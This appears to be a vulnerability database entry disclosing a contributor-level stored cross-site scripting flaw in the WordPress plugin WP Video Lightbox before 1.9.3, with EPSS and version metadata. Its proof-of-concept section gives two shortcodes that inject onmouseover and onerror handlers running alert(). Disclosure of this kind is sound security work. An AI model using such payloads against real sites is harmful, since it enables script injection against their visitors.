Lucene search

K
wpvulndbVishnupriya Ilango WPVDB-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5
HistoryAug 23, 2021 - 12:00 a.m.

WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting

2021-08-2300:00:00
Vishnupriya Ilango
wpscan.com
5

0.001 Low

EPSS

Percentile

19.4%

The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks

PoC

[video_lightbox_vimeo5 video_id=‘“onmouseover=alert(/XSS/) b=”’ width=“640” height=“480” anchor=“Click here to open vimeo video”] [video_lightbox_vimeo5 video_id=“13562192” width=“640” height=“480” anchor=‘http"onerror=alert(/XSS/)//’]

CPENameOperatorVersion
wp-video-lightboxlt1.9.3

0.001 Low

EPSS

Percentile

19.4%

Related for WPVDB-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5